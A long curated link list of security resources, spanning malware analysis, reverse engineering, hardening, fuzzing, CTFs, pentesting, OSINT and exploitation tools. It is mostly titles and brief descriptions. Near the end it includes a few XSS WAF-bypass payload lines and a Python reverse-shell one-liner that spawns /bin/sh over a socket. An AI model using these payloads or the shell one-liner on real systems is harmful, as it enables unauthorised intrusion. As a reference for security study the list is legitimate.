*Please contribute through pull requests- ;)
Another great list: awesome-incident-response
- Nice list here by Cert.BR
- Practical Cryptography for Developers, github
- The Book of Secret Knowledge
- Cert.BR - useful links
- 7º Fórum Brasileiro de CSIRTs
- SANS Pen-Testing Resources: Downloads
- Some list of security projects
- APT & CyberCriminal Campaign Collection
- Repository containing Indicators of Compromise and Yara rules
- Applying DevOps Principles in Incident Response
- Encoding vs. Encryption vs. Hashing vs. Obfuscation
- Shodan: is the world's first search engine for Internet-connected devices. Shodan 2000
- ATTACK-Tools: Utilities for MITRE™ ATT&CK
- hacking-tutorials
- crypto: Lecture notes for a course on cryptography
- tink: Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
- SPLOITUS: Exploit search engine.
- Vulmon: Vulmon is a vulnerability search engine.
- CIS SecureSuite® Membership
- CRYPTO101: Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
- Pagerduty Incident Response: This documentation covers parts of the PagerDuty Incident Response process.
- security-training: Public version of PagerDuty's employee security training courses.
- incident-response-docs: PagerDuty's Incident Response Documentation.
- SMHasher is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions. another repo
- Some CVEs stuff and links here and in here
- MikroTik search on shodan.
- TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
- cve_manager: A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.
- Great online course by MalwareUnicorn
- Some other botnets list
- IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
- Digital Certificates Used by Malware
- Signed Malware – The Dataset
- Malware Sample Sources for Researchers
- Indicators: Champing at the Cyberbit
- Limon - Sandbox for Analyzing Linux Malwares
- A Dynamic Binary Instrumentation framework based on LLVM
- Framework for building Windows malware, written in C++
- binary ninja
- Analyzing a New macOS DNS Hijacker: OSX/MaMi
- A PoC "malware" application with good intentions that aims to stress your anti-malware system: al-khaser
- Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
- Chaos: a Stolen Backdoor Rising Again
- Malware Indicators of Compromise (IOCs)
- Puszek:Yet another LKM rootkit for Linux. It hooks syscall table.
- Joe Sandbox Cloud is a deep malware analysis platform which detects malicious files - API Wrapper.
- EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
- Malware web and phishing investigation by Decent Security.
- A collection of tools for working with TrickBot
- Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
- RegRipper version 2.8 (source code)
- makin - reveal anti-debugging and anti-VM tricks.
- TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
- colental/byob: BYOB (Build Your Own Botnet), another byob
- Source Code for Exobot Android Banking Trojan Leaked Online
- Pegasus: analysis of network behavior
- Ramnit’s Network of Proxy Servers
- snake: a malware storage zoo
- A malware analysis kit for the novice
- malware-ioc: Indicators of Compromises (IOC) of our various investigations
- pftriage: Python tool and library to help analyze files during malware triage and analysis.
- imaginaryC2: Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
- When a malware is more complex than the paper.
- Vba2Graph: Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
- malwoverview: Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample.
- SECT CTF 2018 :: Gh0st, More Smoked Leet Chicken
- What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
- Linux.Malware: Additional Material for the Linux Malware Paper
- PHP Malware Examination
- Analysis of Linux.Haikai: inside the source code
- Cylance vs. MBRKiller Wiper Malware.
- Deep Analysis of TrickBot New Module pwgrab
- multiscanner: Modular file scanning/analysis framework.
- FCL: FCL (Fileless Command Lines) - Known command lines of fileless malicious executions.
- Mac malware combines EmPyre backdoor and XMRig miner
- The Full Guide Understanding Fileless Malware Infections
- 'Injection' Without Injection
- Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample.
- pafish: Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
- Thunderstrike2 details: This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard.
- Malboxes: a Tool to Build Malware Analysis Virtual Machines, github
- Triton is the world’s most murderous malware, and it’s spreading
- Cloak and Dagger — Mobile Malware Techniques Demystified
- IceBox: Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
- Malware Development:
- Command and Control via TCP Handshake
- Joel Sandbox Analysis Report wdeQEksXgm
- emotet: Daily Emotet IoCs and Notes for 09/18/19
- Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
- Mac Malware
- virii: Collection of ancient computer virus source codes
- Detricking TrickBot Loader: TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. decoder, tweet
- Current Emotet Epoch 2 C2 as of 2019-09-26 07:54 US/Eastern
- abuse.ch Feodo Tracker Botnet C2 IP Blocklist
- A repository of LIVE malwares for your own joy and pleasure: theZoo
- malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
- Beginner Malware Reversing Challenges, by MalwareTech. repo
- Ransomware decryption tool
- Schroedinger’s Pet(ya)
- Player 3 Has Entered the Game: Say Hello to 'WannaCry'
- WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
- Ransomware Overview
- Analyzing GrandSoft Exploit Kit and code
- Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
- hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes.
- Avast open-sources its machine-code decompiler
- Morris worm
- make a process unkillable?! (windows 10)
- Attack inception: Compromised supply chain within a supply chain poses new risks – Microsoft Secure.
- Curtis' Blog: Bypassing Next Gen AV During a Pentest
- Inception: Provides In-memory compilation and reflective loading of C# apps for AV evasion.
- Invoke-NeutralizeAV: Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting.
- BinariesThatDoesOtherStuff
- Circlean: USB key cleaner
- The ELF Virus Writing HOWTO
- mcreator: Encoded Reverse Shell Generator With Techniques To Bypass AV's.
- metame: is a simple metamorphic code engine for arbitrary executables.
- IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
- Turla: In and out of its unique Outlook backdoor
- QMKhuehuebr: Trying to hack into keyboards
- “VANILLA” malware: vanishing antiviruses by interleaving layers and layers of attacks
- Dangers of the Decompiler
- RE guide for beginners: Methodology and tools
- REDasm: Crossplatform, interactive, multiarchitecture disassembler
- Reversing ARM Binaries
- Programmer De-anonymization from Binary Executables
- syntia: Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
- Reverse engineering WhatsApp Web
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
- Reverse Engineering for Beginners
- VivienneVMM: VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
- Xori: Custom disassembly framework
- rattle: Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts.
- starshipraider: High performance embedded systems debug/reverse engineering platform
- GBA-IDA-Pseudo-Terminal: IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
- binja-ipython: A plugin to integrate an IPython kernel into Binary Ninja.
- PySameSame: This is a python version of samesame repo to generate homograph strings
- Reversing a Japanese Wireless SD Card From Zero to Code Execution
- Practical-Reverse-Engineering-using-Radare2: Training Materials of Practical Reverse Engineering using Radare2
- idaemu: idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro.
- LIEF: Library to Instrument Executable Formats (github)
- pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
- DEBIN: Predicting Debug Information in Stripped Binaries
- Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
- lighthouse: Code Coverage Explorer for IDA Pro & Binary Ninja
- Manticore: Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. manticore: Symbolic execution tool
- Beam me up, CFG.: Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
- Getting Started with Frida Tools
- Frida hooking android :part 1, part 2, part 3, part 4 and part 5
- PBA - Analysis Tools: My own versions from the programs of the book "Practical Binary Analysis"
- functrace: is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
- Signature-Base: signature-base is the signature database for my scanners LOKI and SPARK Core.
- Generic Anomalies: Detects an embedded executable in a non-executable file
- Virtuailor: IDAPython tool for C++ vtables reconstruction.
- Linux Reverse Engineering CTFs for Beginners.
- execution-trace-viewer: Tool for viewing and analyzing execution traces
- Reverse Engineering of a Not-so-Secure IoT Device
- Python for Reverse Engineering 1: ELF Binaries
- Kaitai Struct: A new way to develop parsers for binary structures.
- findLoop: find possible encryption/decryption or compression/decompression code.
- mkYARA: Writing YARA rules for the lazy analyst (github)
- Reverse Engineering 'A Link to the Past (GBA)' ep 1
- wiggle: The concepting self hosted executable binary search engine.
- Python for Reverse Engineering 1: ELF Binaries
- uncompyle6: A cross-version Python bytecode decompiler
- Decompyle++: C++ python bytecode disassembler and decompiler
- Reverse engineering Go binaries using Radare 2 and Python
- bearparser
- EFISwissKnife: An IDA plugin to improve (U)EFI reversing.
- Reverse-engineering precision op amps from a 1969 analog computer
- CPU Adventure – Unknown CPU Reversing: We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
- ghidra-firmware-utils: Ghidra utilities for analyzing firmware
- dragondance: Binary code coverage visualizer plugin for Ghidra
- Decompiler Analysis Engine: Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable.
- Working With Ghidra's P-Code To Identify Vulnerable Function Calls
- GhIDA: Ghidra decompiler for IDA Pro.
- Ghidraaas: Ghidra as a Service
- SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering. repo
- GhidraX64Dbg: Extract annoations from Ghidra into an X32/X64 dbg database.
- Inject code into running Python processes
- malspider: Malspider is a web spidering framework that detects characteristics of web compromises.
- AIL-framework: AIL framework - Analysis Information Leak framework
- Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)
- See your site config with Hardenize
- Nice article with a lot of resources: Common approaches to securing Linux servers and what runs on them.
- Secure Secure Shell by stribika
- A lot of good posts by geek flare:
- List of sites with two factor auth
- yubikey-ssh-setup
- This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys.
- solo-hw: Hardware sources for Solo
- Sarlacc is an SMTP server that I use in my malware lab to collect spam from infected hosts.
- linux-hardened: Minimal supplement to upstream Kernel Self Protection Project changes.
- upvote: A multi-platform binary whitelisting solution
- ssh-auditor: The best way to scan for weak ssh passwords on your network
- iptables-essentials: Iptables Essentials: Common Firewall Rules and Commands.
- reconbf: Recon system hardening scanner
- FirewallChecker: A self-contained firewall checker
- Implementing Least-Privilege Administrative Models
- BlueWars: Capture The Flag Defensivo que aconteceu na H2HC
- Iptables Essentials: Common Firewall Rules and Commands.
- prowler: AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for AWS guide.
- nftables: nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework.
- CCAT: Cisco Config Analysis Tool
- Keystone Project. Github: Keystone Enclave
- Zero-knowledge attestation
- 9 Kubernetes Security Best Practices Everyone Must Follow
- Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
- Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
- ERNW Repository of Hardening Guides: This repository contains various hardening guides compiled by ERNW for various purposes.
- The Practical Linux Hardening Guide: 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress.
- security.txt: A proposed standard which allows websites to define security policies.
- How To Secure A Linux Server: An evolving how-to guide for securing a Linux server.
- opmsg: is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different.
- Ciderpress: Hardened wordpress installer
- Apache Security by Ivan Ristić
- dotdotslash: An tool to help you search for Directory Traversal Vulnerabilities
- A new security header: Feature Policy
- snuffleupagus: Security module for php7 - Killing bugclasses and virtual-patching the rest!
- FOPO-PHP-Deobfuscator: A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
- Decode.Tools: Decode PHP Obfuscator by FOPO
- Search if your credentials where leaked: Cr3dOv3r
- pw-pwnage-cfworker: Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
- XSS Exploit code for retrieving passwords stored in a Password Vault
- login_duress: A BSD authentication module for duress passwords
- XSStrike: Most advanced XSS detection suite.
- Was my password leaked? pwndb: Search for creadentials leaked on pwndb.
- bitwarden_rs: Unofficial Bitwarden compatible server written in Rust
- pcfg_cracker: Probabilistic Context Free Grammar (PCFG) password guess generator
- Hardening C/C++ Programs Part II – Executable-Space Protection and ASLR
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- sanitizers
- Gitian is a secure source-control oriented software distribution method.
- Canary:Input Detection and Response
- Canarytokens by Thinkst, Quick, Free, Detection for the Masses
- Wycheproof: Project Wycheproof tests crypto libraries against known attacks.
- Web App Security 101: Keep Calm and Do Threat Modeling
- SSL/TLS for dummies:
- heaphopper: HeapHopper is a bounded model checking framework for Heap-implementations
- Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings.
- SEI CERT C Coding Standard: The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.
- Safe C Library: The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming.
- Field Experience With Annex K — Bounds Checking Interfaces
- TSLint: An extensible linter for the TypeScript language.
- rubocop: A Ruby static code analyzer and formatter, based on the community Ruby style guide.
- Librando: transparent code randomization for just-in-time compilers
- Checked C: Making C Safe by Extension. github
- Practical case: Buffer Overflow 0x01
- pigaios: A tool for diffing source codes directly against binaries. slides
- pigaios: A tool for diffing source codes directly against binaries. slides
- A Git Horror Story: Repository Integrity With Signed Commits. How to use git securely (signing commits)
- An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
- Tooling for verification of PGP signed commits
- tlse: Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
- tinyalloc: malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
- Sandboxed API: Sandboxed API automatically generates sandboxes for C/C++ libraries
- HACL*: a formally verified cryptographic library written in F*
- Villoc: Villoc is a heap visualisation tool, it's a python script that renders a static html file.
- How C array sizes become part of the binary interface of a library
- Insecure Direct Object References
- MazuCC: A minimalist C compiler with x86_64 code generation
- When the going gets tough: Understanding the challenges with Product commoditization in SCA.
- huskyCI: huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.
- (pt-br) GTER 47 | GTS 33 - Dia 2 (parte 1): nice talk by Daniel Carlier and Silvia Pimpão.
- secDevLabs: A laboratory for learning secure web development in a practical manner.
- HTTP Security Headers - A Complete Guide
- SAFECode: is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
- OWASP Broken Web Applications Project. OWASP BWA repository files.
- Security Code Review 101
- Generating Software Tests (github)
- afl-unicorn: Fuzzing Arbitrary Binary Code
- Regaxor: A regular expression fuzzer
- BrokenType: TrueType and OpenType font fuzzing toolset
- Dizzy-legacy: Network and USB protocol fuzzing toolkit.
- Start-Hollow.ps1: My musings with PowerShell
- auditd-attack: A Linux Auditd rule set mapped to MITRE's Attack Framework
- Dizzy-legacy: Network and USB protocol fuzzing toolkit.
- BFuzz: Fuzzing Browsers
- Structure-Aware Fuzzing with libFuzzer with fuzzer test suite
- Fuzzilli: A JavaScript Engine Fuzzer.
- Materials from Fuzzing Bay Area meetups.
- The Web API Checklist: 43 Things To Think About When Designing, Testing, and Releasing your API
- API-Security-Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
- REST API Checklist
- Your Comprehensive Web API Design Checklist
- API Security Testing: Rules And Checklist
- API Security Testing - How to Hack an API and Get Away with It:
- API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
- REST API Testing Tutorial: Sample Manual Test Case
- REST Security Cheat Sheet: CheatSheetSeries
- Penetration Testing RESTful Web Services
- RESTful web services penetation testing
- Astra: Automated Security Testing for REST API’s
- The fast, easy, and affordable way to train your hacking skills.
- Write-ups for crackmes and CTF challenges by eleemosynator
- pwntools: CTF framework and exploit development library
- google-ctf
- Pwn2Win 2018. unsolved
- Leap Security
- 35c3ctf-challs
- ctf-tasks: An archive of low-level CTF challenges developed over the years.
- $50 million CTF Writeup.
- Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
- linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
- RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data
- Azure IoT HUB
- A collection of vulnerable ARM binaries for practicing exploit development
- arm vm working out of the box for everyone
- Statically compiled ARM binaries for debugging and runtime analysis.
- Hacker Finds Hidden 'God Mode' on Old x86 CPUs -> rosenbridge: Hardware backdoors in some x86 CPUs
- USBHarpoon Is a BadUSB Attack with A Twist
- Ground Zero: Part 3-2 Patching Binaries with Radare2 - ARM64
- A 2018 practical guide to hacking RFID/NFC
- riscv-ida: RISC-V ISA processor module for IDAPro 7.x
- mac-age: MAC address age tracking
- OpenWRT em Mikrotik Routerboard 750
- Lexra: Lexra did implement a 32-bit variant of the MIPS architecture.
- IntelTEX-PoC: Intel Management Engine JTAG Proof of Concept
- me_cleaner: Tool for partial deblobbing of Intel ME/TXE firmware images.
- Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
- me_removal: Testing complete ME removal on Intel HEDT systems
- IDA-scripts: IDAPro scripts/plugins
- Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM.
- Something about IR optimization: Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself.
- Dragonblood: Analysing WPA3's Dragonfly Handshake
- Arm Heap Exploitation, by Azeria:
- AZM Online Arm Assembler
- Part 1: Understanding the Glibc Heap Implementation
- Part 2: Understanding the GLIBC Heap Implementation
- Heap Exploit Development– Case study from an in-the-wild iOS 0-day. thread
- The Hacker's Hardware Toolkit: The best hacker's gadgets for Red Team pentesters and security researchers.
- Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
- Extracting seed from Ellipal wallet
- Breaking Trezor One with Side Channel Attacks: A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes.
- Rewriting Functions in Compiled Binaries
- Seclists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.
- Search operating systems on the network: osquery
- osquery Across the Enterprise
- Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection
- Zero Day Zen Garden: Windows Exploit Development - Part 0
- Zero Day Zen Garden: Windows Exploit Development - Part 1
- Zero Day Zen Garden: Windows Exploit Development - Part 2
- Zero Day Zen Garden: Windows Exploit Development - Part 3
- Zero Day Zen Garden: Windows Exploit Development - Part 4
- Got Meterpreter? PivotPowPY!
- Pentest Tips and Tricks
- Ethical Hacking Course: Enumeration Theory
- Script to steal passwords from ssh.
- Network Infrastructure Penetration Testing Tool
- Shellen:Interactive shellcoding environment to easily craft shellcodes
- tcp connection hijacker
- Pown.js: is the security testing an exploitation framework built on top of Node.js and NPM.
- Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine.
- trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
- TIDoS-Framework: The offensive web application penetration testing framework.
- massh-enum: OpenSSH 7.x Mass Username Enumeration.
- GitMiner: Tool for advanced mining for content on Github
- DHCPwn: All your IPs are belong to us.
- badKarma: advanced network reconnaissance toolkit.
- Danger-zone: Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
- go-tomcat-mgmt-scanner: A simple scanner to find and brute force tomcat manager logins
- IoTSecurity101: From IoT Pentesting to IoT Security
- subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
- red_team_telemetry
- SharpSploitConsole: SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.
- CrackMapExec: A swiss army knife for pentesting networks
- Sublist3r: Fast subdomains enumeration tool for penetration testers
- DarkSpiritz: A penetration testing framework for Linux, MacOS, and Windows systems.
- proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
- PentestHardware: Kinda useful notes collated together publicly
- novahot:A webshell framework for penetration testers.
- MarkBaggett’s gists: This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation.
- Serverless Toolkit for Pentesters
- pentest_scripts: scrapes linkedin and generates emails list.
- Penetration Testing Tools Cheat Sheet ∞: Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test.
- shellver: Reverse Shell Cheat Sheet TooL
- IVRE: Network recon framework (github).
- (pt-br) DomainInformation: Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
- GTRS: GTRS - Google Translator Reverse Shell
- shellcode2asmjs: Automatically generate ASM.JS JIT-Spray payloads
- LeakLooker: Find Open Databases in Seconds. github
- pown-recon: A powerful target reconnaissance framework powered by graph theory.
- Micro8: The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source.
- Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
- Penetration Test Guide based on the OWASP + Extra: This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 15 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty.
- Insecure Direct Object References (OTG-AUTHZ-004)
- Order of the Overflow Proxy Service
- liffy: Local file inclusion exploitation tool
- foxyproxy.json: Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
- pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios.
- Linux for Pentester: ZIP Privilege Escalation
- Presentation Clickers: Keystroke injection vulnerabilities in wireless presentation clickers.
- Better API Penetration Testing with Postman:
- DNS and DHCP Recon using Powershell
- REST Assured: Penetration Testing REST APIs Using Burp Suite:
- SiteBroker: A cross-platform python based utility for information gathering and penetration testing automation!
- public-pentesting-reports. Curated list of public penetration test reports released by several consulting firms and academic security groups
- report-ng: Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
- PandocPentestReport: This repository shows my effort to create a pandoc based pentest report template.
- Technical Report template: LaTeX template for technical reports
- Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
- OSINT tool for visualizing relationships between domains, IPs and email addresses.
- sn0int: Semi-automatic OSINT framework and package manager
- A Pentester’s Guide – Part 1: OSINT – Passive Recon and Discovery of Assets
- A Pentester’s Guide - Part 2: OSINT – LinkedIn is Not Just for Jobs
- iKy: I Know You (OSINT project)
- Gitrob: Putting the Open Source in OSINT
- OSint Tools: On this page you’ll find tools which you can help do your OSINT reseach.
- datasploit: An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.
- the-endorser: An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
- OSINT-y Goodness: HathiTrust Digital Library
- OSINT Resources for 2019
- Awesome OSINT: 😱 A curated list of amazingly awesome OSINT
- Striker is an offensive information and vulnerability scanner
- SQL Vulnerability Scanner
- Decentralized Application Security Project, github
- BLEAH: A BLE scanner for "smart" devices hacking.
- Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
- Beating the OWASP Benchmark
- CMSScan: Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.
- SSRF Tips: some tips with Server Side Request Forgery.
- Meteor Blind NoSQL Injection
- Security Bulletins that relate to Netflix Open Source
- Web Application Penetration Testing Course URLs
- Web Application Penetration Testing Notes
- quarantyne: Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
- Burp Suite:
- Awesome Burp Extensions: A curated list of amazingly awesome Burp Extensions
- BurpSuiteHTTPSmuggler: A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
- AutoRepeater: Automated HTTP Request Repeating With Burp Suite
- AES-Killer v3.0: Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
- Femida-xss: Automated blind-xss search for Burp Suite
- dotNetBeautifier: A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
- Java-Deserialization-Scanner: All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
- JavaSerialKiller: Burp extension to perform Java Deserialization Attacks.
- BurpBounty: Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv
- Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
- Sitadel: Web Application Security Scanner.
- WAF through the eyes of hackers
- Some nice payloads to bypass XSS WAF:
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
<IMG SRC="jav
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- IOSurface exploit
- Attacking a co-hosted VM: A hacker, a hammer and two memory modules
- How To Create a Metasploit Module
- Installing Metasploit Pro, Ultimate, Express, and Community
- unfurl, An Entropy-Based Link Vulnerability Analysis Tool
- A collection of vulnerable ARM binaries for practicing exploit development
- A collection of PHP exploit scripts
- Sage ACF Blocks: A Sage 10 helper package for building ACF blocks rendered using blade templates.
- WebKit exploit
- Modern Binary Exploitation - Spring 2015
- DriveCrypt: DriveCrypt Dcr.sys vulnerability exploit
- Faxploit: Sending Fax Back to the Dark Ages
- beebug: A tool for checking exploitability
- NAVEX: Precise and scalable exploit generation for dynamic web applications
- Three New DDE Obfuscation Methods
- SILENTTRINITY: A post-exploitation agent powered by Python, IronPython, C#/.NET
- fuxploider: File upload vulnerability scanner and exploitation tool.
- Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff.
- LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
- linpostexp: Linux post exploitation enumeration and exploit checking tools
- Attacking Google Authenticator
- Pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. installation guide, starting guide
- Glibc Heap Exploitation Basics:
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
- movfuscator: The single instruction C compiler
- beebug: A tool for checking exploitability
- UEFI vulnerabilities classification focused on BIOS implant delivery and What makes OS drivers dangerous for BIOS?
- MikroTik Firewall & NAT Bypass
- 3D Accelerated Exploitation: The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
- GhostDelivery: Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions.
- Beat the hole in the ATM: hacking an diebold ATM.
- RedGhost: Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
- PowerSploit: is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
- Z-Shave. Exploiting Z-Wave downgrade attacks
- Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
- I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃: python -c "import pty,socket;h,p='',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
- Awesome Red Teaming
